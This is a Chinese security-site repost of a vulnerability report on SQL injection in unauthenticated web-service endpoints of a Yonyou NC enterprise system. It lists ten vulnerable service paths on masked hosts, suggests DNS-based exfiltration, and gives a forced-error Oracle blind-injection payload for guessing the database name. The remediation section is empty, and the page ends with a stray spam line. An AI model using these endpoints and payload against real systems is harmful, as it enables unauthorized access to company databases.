頻道欄目
首頁 > 資訊 > 企業安全 > 正文

用友某系統多處注入漏洞打包

16-07-19        來源:[db:作者]  
收藏   我要投稿

wooyun搜了一下,沒有人提,來一發。

首先,該接口是無需權限訪問的。

已http://**.**.**.**/bugs/wooyun-2010-0178322為例:

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl

均存在注入

 

04184.png

 

 

04185.png

 

無法報錯注入的,因為我們填充的數據是隨意填充的,也沒有辦法盲注,可以使用dns查詢的方式。

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService

 

04186.png

 

還有一種情況是無法報錯注入,也不能盲注,延時也不可以,可以使用強制報錯盲注的辦法:

'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 來猜解數據。

http://**.**.**.**:9090/

解決方案:

相關TAG標簽
上一篇:臺積電:絕大多數7nm客戶都會轉向6nm_IT新聞_博客園
下一篇:最后一頁
相關文章
圖文推薦

關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心

版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站

美女MM131爽爽爽毛片